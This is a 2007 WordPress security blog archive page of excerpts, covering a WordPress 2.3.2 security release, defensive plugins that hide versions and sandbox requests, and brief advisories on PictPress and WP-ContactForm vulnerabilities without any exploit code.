Archive for December, 2007
WP 2.3.2 Security Fixes
A new version of WordPress (2.3.2) is now available for download.
The update fixes some critical security vulnerabilities.
Interestingly, WordPress have decided to turn off WordPress errors by default now. So, our bs-wp-noerrors plugin is deprecated but still useful for those of us who haven’t trusted WP 2.3 enough to upgrade.
This version also presents some additional clean [...]
bs-wp-sandbox plugin: Lock WP Functions
The BlogSec WordPress Sandbox plugin works on a whitelist principle. We accept all pages and posts (including wp-admin, feeds and xmlrpc) but deny requests for any other resources or WordPress functions.
I came up with the idea for this plugin when developing my homepage WithDK.com (where it is currently being tested). I wanted WordPress to act [...]
bs-wp-noversion plugin: Removes WordPress Version
BlogSecurity Wordpress Noversion plugin (bs-wp-noversion), prevents WordPress version leakage. Another simple, yet extremely useful WordPress security plugin.
Alot of attackers and automated tools will try and determine software versions before launching exploit code. Removing your WordPress blog version may discourage some attackers and certainly will mitigate virus and worm programs that rely on software versions.
Plugin Name: [...]
WordPress PictPress File Include Vulnerability
An exploit has been made publicly available affecting Wordpress PictPress
WP-ContactForm HTML Injection Vulnerability
The popular WP-ContactForm plugin has been found vulnerable to HTML Injection.
This could allow an attacker to compromise your blog if you are authenticated to your blog while at the same time visiting a page with the embedded attack. Another popular attack is using phishing type e-mails.
BlogSec is not aware of any fixes as yet. We [...]
